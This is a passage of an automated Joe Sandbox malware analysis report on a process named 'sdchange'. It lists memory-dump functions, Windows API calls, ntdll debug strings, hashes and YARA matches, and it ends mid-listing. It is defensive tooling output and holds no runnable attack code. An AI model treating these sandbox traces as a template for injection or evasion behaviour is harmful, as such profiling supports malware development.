CreateProcessInternalW.KERNELBASE(?,?,?,?,030C869E,00000010,?,?,?,00000044,?,00000010,030C869E,?,?,?), ref: 030D9D00

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 7c8b464a843703bbec49435904aff0c5ce2251e1db31e27353c9d782aaa45bab
Instruction ID: c51de335a0a692a5261f334dadddb30d3996bea926babe8009bf268c6f73001e
Opcode Fuzzy Hash: 7c8b464a843703bbec49435904aff0c5ce2251e1db31e27353c9d782aaa45bab
Instruction Fuzzy Hash: 1E01C4B2205648BFCB44DE9DDC80EEB77ADAF8C714F018208BA09D7240D630F8518BA4

Function 030B9E90 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030B9ED2

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c7256101f11bf9f3aec988876ff7e269b3d0dfa625f948b33c6f6db0392d0e1b
Instruction ID: a4eeab810963e3c0e8631777e845c32385d19d6d09bc9a24d7a9466efbfe2371
Opcode Fuzzy Hash: c7256101f11bf9f3aec988876ff7e269b3d0dfa625f948b33c6f6db0392d0e1b
Instruction Fuzzy Hash: 2DF06D3738130436E220A5A9AC02FD7B79C8FC0BA1F184826F70CEF5C0D992B84187E8

Function 030B9E8C Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030B9ED2

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 2458dd629e8c56071aa083e2214a5cedd2ae75a2931d036be57c3ec9cf623d87
Instruction ID: c91a4c6df385927b8cf651d78fedcc8859a8c2c19be0cb92da41a8a9ba51703a
Opcode Fuzzy Hash: 2458dd629e8c56071aa083e2214a5cedd2ae75a2931d036be57c3ec9cf623d87
Instruction Fuzzy Hash: 16F0923728130436E231A6999C02FD76B9C8FC0B51F184529F71CAF6C0D992B84187E8

Function 030D9BC0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(030C1DA9,?,030D5D5E,030C1DA9,030D5A4E,030D5D5E,?,030C1DA9,030D5A4E,00001000,?,?,00000000), ref: 030D9BFC

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e30b1026ecbcbb0e18fbdc03bfe93b109ace04a600ad3d0099f24d9eb94016cb
Instruction ID: 3a8363ef2e4cf3f6478a461a754408d1e3e6293fdfcd0c0efd328d96a293b939
Opcode Fuzzy Hash: e30b1026ecbcbb0e18fbdc03bfe93b109ace04a600ad3d0099f24d9eb94016cb
Instruction Fuzzy Hash: 06E0E5762403587BD614EE99DC46EDB77ACEFC9710F408519F909AB241D770B9108BB8

Function 030D9C10 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFBFC95,00000007,00000000,00000004,00000000,030C4145,000000F4), ref: 030D9C4F

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0f8450adf8925460321119ba9bb7b8c5ca73b419a1b928270e2caa9687713646
Instruction ID: 895bd60d6ff24ddc611a6232c548c05073367f0486f66b614ef73084b7b7ae63
Opcode Fuzzy Hash: 0f8450adf8925460321119ba9bb7b8c5ca73b419a1b928270e2caa9687713646
Instruction Fuzzy Hash: 69E0E5B6340398BBD614EE99DC45EDB77ACEFC9710F108419FA09AB241D670B9108BB9

Function 030C86E0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 030C8709

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e494b8f49d5241b52e5b2a7818939cf20cfe42a3dd1b9a145458aa9303ab63de
Instruction ID: 9551f062dcb8d1d97479ff5ff9bb77e47fe9437f2878f723a568b7a6f07307a5
Opcode Fuzzy Hash: e494b8f49d5241b52e5b2a7818939cf20cfe42a3dd1b9a145458aa9303ab63de
Instruction Fuzzy Hash: CDE0DF392103043AEA10A6A8EC89F6B33888B48720F088724F81C9B6E2F538E4028254

Function 030C84C7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,030C20A0,030D838E,030D5A4E,030C206D), ref: 030C8500

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b99a2b17a602d3a5a1a5f5847fcfaee4629fdb6064706f84a1c5b9d85364e3a8
Instruction ID: be441c876ddb8d4560262b08ac616e8c105cb3bd999cc33c087aa5bc986d9849
Opcode Fuzzy Hash: b99a2b17a602d3a5a1a5f5847fcfaee4629fdb6064706f84a1c5b9d85364e3a8
Instruction Fuzzy Hash: 26E08C392843423FE355F7A4DC02F9A6AD95BC5640F0888A8EA48EB2C3DA62D5008295

Function 030C86DD Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 030C8709

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7b5b3c4728b12678dca47dc6b235be0fe356aee2c2d9798130a337f5789a88ca
Instruction ID: 517b7d0888619d18de4cd07e9181bbd10ce5b34b0171a069323820e3b7415d24
Opcode Fuzzy Hash: 7b5b3c4728b12678dca47dc6b235be0fe356aee2c2d9798130a337f5789a88ca
Instruction Fuzzy Hash: 48E026B815175035FB20A2646D89B6F33584F40320F2C8B14F82DAA1D2E024D0428304

Function 030C117B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111), ref: 030C1187

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
Instruction ID: 2703ceb1d91a69539e9f38dd3b48bdc9ee318a4acc78a1068a4a8d6806b81c10
Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
Instruction Fuzzy Hash: C6D0A77774110C35A60155846CC1CFEB75CDB845A5F004067FF08D1140D521490606B0

Function 030C84D0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,030C20A0,030D838E,030D5A4E,030C206D), ref: 030C8500

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 7276f3188d40b705f470631b47093e951d29d961259e623b333e21f3201b2689
Instruction ID: 02f9834c1fdd15d71229d4774eb4ecef2d93a2199427640264209a7b8f8e5c24
Opcode Fuzzy Hash: 7276f3188d40b705f470631b47093e951d29d961259e623b333e21f3201b2689
Instruction Fuzzy Hash: B2D05E796403053BE600F7A4DC03F9A36CD5B80B50F04C468F908EB2C3D965E51082A9

Function 04FF2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2C24

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36b6ffa08da421a94f8b9933f800139269364087e6e30cc61376702c4e599e41
Instruction ID: 1a12862d337b777e2becd4f4cefd2aa127fab38bcfe1df93c7d19455a694c8bf
Opcode Fuzzy Hash: 36b6ffa08da421a94f8b9933f800139269364087e6e30cc61376702c4e599e41
Instruction Fuzzy Hash: 27B09B72D019D5C6FB11E7605A0871B7910BFD1711F56C061D3030686E4739D1D1E175

Non-executed Functions

Function 052D04EF Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2886136469.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52d0000_sdchange.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ba002c938994b5554a6283ef3f3c7471fc19f11e7bea809e2415195cca5c7c2
Instruction ID: becd062b37382f9bf97a7c7cc75eeac03e156753d536f7ce8fc4c8c368a574ba
Opcode Fuzzy Hash: 1ba002c938994b5554a6283ef3f3c7471fc19f11e7bea809e2415195cca5c7c2
Instruction Fuzzy Hash: 4141E97062DF0D8FD768EF6890856B6F3E6FF45310F50052DD98AC3262F670E8468695

Function 030BE52E Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aa2cc60c90f14bd3491c13878466b12cf4c6dea9fc1200f45e6cb4fbcfe8499
Instruction ID: 5f0c4beea2813c00c46f1347d763832cedb5058ab601257baae903443e693a37
Opcode Fuzzy Hash: 6aa2cc60c90f14bd3491c13878466b12cf4c6dea9fc1200f45e6cb4fbcfe8499
Instruction Fuzzy Hash: 58C02B13A5100400C1100C1C38843F0F73EC387131E0023D3EE48E3A018443F0830AC8

Function 052DDFC9 Relevance: 57.7, Strings: 46, Instructions: 215COMMON

Download Yara Rule

Strings

@, xrefs: 052DE066
)*+,, xrefs: 052DE0BA
!"#$, xrefs: 052DE0AC
@@@@, xrefs: 052DE154
@@@@, xrefs: 052DE123
@@@@, xrefs: 052DE1A8
@@@@, xrefs: 052DE162
@@@@, xrefs: 052DE146
@@@@, xrefs: 052DE13F
@@@@, xrefs: 052DE138
@@@@, xrefs: 052DE193
@@@@, xrefs: 052DE131
@@@@, xrefs: 052DE05F
123@, xrefs: 052DE0C8
@@@@, xrefs: 052DE0D6
@@@@, xrefs: 052DE10E
@@@@, xrefs: 052DE1AF
@@@@, xrefs: 052DE0F2
@@@?, xrefs: 052DE043
@@@@, xrefs: 052DE097
@@@@, xrefs: 052DE0E4
-./0, xrefs: 052DE0C1
@@@@, xrefs: 052DE107
@@@@, xrefs: 052DE169
@@@@, xrefs: 052DE1A1
@@@@, xrefs: 052DE0EB
@@@@, xrefs: 052DE11C
4567, xrefs: 052DE04A
<=@@, xrefs: 052DE058
%&'(, xrefs: 052DE0B3
@@@@, xrefs: 052DE18C
@@@@, xrefs: 052DE185
@@@@, xrefs: 052DE15B
@@@@, xrefs: 052DE115
@@@@, xrefs: 052DE14D
@@@@, xrefs: 052DE0CF
@@@@, xrefs: 052DE12A
89:;, xrefs: 052DE051
@@@@, xrefs: 052DE17E
?, xrefs: 052DE1C0
@@@@, xrefs: 052DE177
@@@@, xrefs: 052DE170
@@@@, xrefs: 052DE0DD
@@@@, xrefs: 052DE0F9
@@@@, xrefs: 052DE19A
@@@@, xrefs: 052DE100

Memory Dump Source

Source File: 00000006.00000002.2886136469.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52d0000_sdchange.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3754132690
Opcode ID: f995138655b78f498d89d2ffc2d3d765cfe90b2b5d5e64d29202eccb2ef66a67
Instruction ID: a2d9e898fd0989fc89699ca50561a38ef69181d079409c5ee3045ec70f125453
Opcode Fuzzy Hash: f995138655b78f498d89d2ffc2d3d765cfe90b2b5d5e64d29202eccb2ef66a67
Instruction Fuzzy Hash: 45916FF04182948AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB95

Function 04FF2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04FF293C
___swprintf_l.LIBCMT ref: 04FF295E
___swprintf_l.LIBCMT ref: 04FF29A3
___swprintf_l.LIBCMT ref: 0502A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 0502A54E
:%u.%u.%u.%u, xrefs: 0502A5B8
::%hs%u.%u.%u.%u, xrefs: 0502A527
ffff:, xrefs: 0502A504

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 5c1c821b79a750d43c86a6538bde549106fe8aaa12d66365759365a114d62c40
Instruction ID: 57f545f0d10517f42206bf08be57c2868d3361e4e5b66ca9557f5f8d47e9f3b3
Opcode Fuzzy Hash: 5c1c821b79a750d43c86a6538bde549106fe8aaa12d66365759365a114d62c40
Instruction Fuzzy Hash: F25105B2B00126BFDB20DF989C9097FF7B8BF08200B508169E565D7641E775EE01DBA0

Function 05062410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 050624A6
___swprintf_l.LIBCMT ref: 050624E2
___swprintf_l.LIBCMT ref: 0506257D
___swprintf_l.LIBCMT ref: 050625A3
___swprintf_l.LIBCMT ref: 050625C8
___swprintf_l.LIBCMT ref: 05062608

Strings

::%hs%u.%u.%u.%u, xrefs: 0506249E
::ffff:0:%u.%u.%u.%u, xrefs: 050624DA
:%u.%u.%u.%u, xrefs: 050625FF
ffff:, xrefs: 0506247D, 0506249D

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 9562a0f37e012faa72a5101703ec4e5095ab242fd306416778be6e36e1d508a6
Instruction ID: 84ce5c9934a548d9ba5e8e499c24aef4beca4df5d95cb9ad4c8c09e3c824ab28
Opcode Fuzzy Hash: 9562a0f37e012faa72a5101703ec4e5095ab242fd306416778be6e36e1d508a6
Instruction Fuzzy Hash: 3E512AB9A00646AFDB30DF5CD8909BFBBFAFF44200B448459E8D6D7681D674EA40C760

Function 04FE7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 05024713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05024655
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05024742
CLIENT(ntdll): Processing section info %ws..., xrefs: 05024787
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050246FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05024725
ExecuteOptions, xrefs: 050246A0

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 923e49d8289561f6573a216d414d89285ca9098e7010c56c4cedadd53a04a74f
Instruction ID: 0b2ea7c19593902c5a3467b619b944c44e84dd5c8172f2482c6daa96832899b1
Opcode Fuzzy Hash: 923e49d8289561f6573a216d414d89285ca9098e7010c56c4cedadd53a04a74f
Instruction Fuzzy Hash: EA51DA31A00219BBEF11BAA5ED45FFE77E8AF14705F0400A9D505A7190EB71BE478F51

Function 05086940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: 4fc599c9a66dfa73f42d324b46366ab3e23ce782da9a397d96bf86196ca81470
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: 6D021370608341AFD345EF28D894E6EBBE5FFD8704F15892DB9858B264DB32E905CB42

Function 04FFB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04FFB6BF

Strings

0, xrefs: 04FFB66F
0, xrefs: 04FFB695
+, xrefs: 04FFB65A
-, xrefs: 04FFB650

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 93fedc7a71d3f20d7434e2022efb15ebe830f5966065bc6e9f44fb87dcac7eec
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: F081B071E052499FDF248E68CC917FEBBB2AF85350F184299DA51A72B0D734B843CB54

Function 050620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0506214F
___swprintf_l.LIBCMT ref: 05062172

Strings

]:%u, xrefs: 05062169
[, xrefs: 0506212B
%%%u, xrefs: 05062146

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 9ce8c424a81a79796fa331bb2b00d4f6e964711f2bae510d1fbd7b5c4e77d516
Instruction ID: 955c9c19b768ed4b7723b459e3c5af1b66da6169e412368af5b82e2caba77a25
Opcode Fuzzy Hash: 9ce8c424a81a79796fa331bb2b00d4f6e964711f2bae510d1fbd7b5c4e77d516
Instruction Fuzzy Hash: AF2153BAE0411AABDB10DF69DC54AFF77E9AF54644F480116E905E7240EB30EA428BA1

Function 04FDF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0502031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050202E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050202BD

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 6c65c48ce31e078471d0984e0aacf19ff556c366602ec7fc8d33b78e9dcfaab4
Instruction ID: 50a420b58dc5fdafcd85465b333419816dfc0de49080f1826debeb9d0a62768a
Opcode Fuzzy Hash: 6c65c48ce31e078471d0984e0aacf19ff556c366602ec7fc8d33b78e9dcfaab4
Instruction Fuzzy Hash: 14E1D031A087419FD724CF28D894F6AB7E2BF48314F180A6DF5968B2E0D775E846CB52

Function 04FEBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 05027B8E
RTL: Re-Waiting, xrefs: 05027BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05027B7F

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 281b9d1056781d77724b467db8c1badd00e5938ea1f8a0536d878a43515aa0f1
Instruction ID: 947aba79afb0788608ba398391d279580c21a1b31bf03e5583b1501bfeae66bb
Opcode Fuzzy Hash: 281b9d1056781d77724b467db8c1badd00e5938ea1f8a0536d878a43515aa0f1
Instruction Fuzzy Hash: 6741F1317047429FDB24DE26DC41B6AB7E5FF88712F000A2DE95ADB290DB70F8068B91

Function 04FEB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0502728C

Strings

RTL: Resource at %p, xrefs: 050272A3
RTL: Re-Waiting, xrefs: 050272C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05027294

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 15accebb72a8f5e0ddcf4564a58605ebade04f221aa57d613743082dc0cdcfc4
Instruction ID: 6decbc40f2cf0e168a991ed399f694c798147fda118f4df27f8853f620594adf
Opcode Fuzzy Hash: 15accebb72a8f5e0ddcf4564a58605ebade04f221aa57d613743082dc0cdcfc4
Instruction Fuzzy Hash: 5B411D32B00222ABDB21DE26DC41B6AB7E5FF94711F100629F955EB280DB31F856CBD1

Function 05062300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0506238D
___swprintf_l.LIBCMT ref: 050623B3

Strings

]:%u, xrefs: 050623AA
%%%u, xrefs: 05062384

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
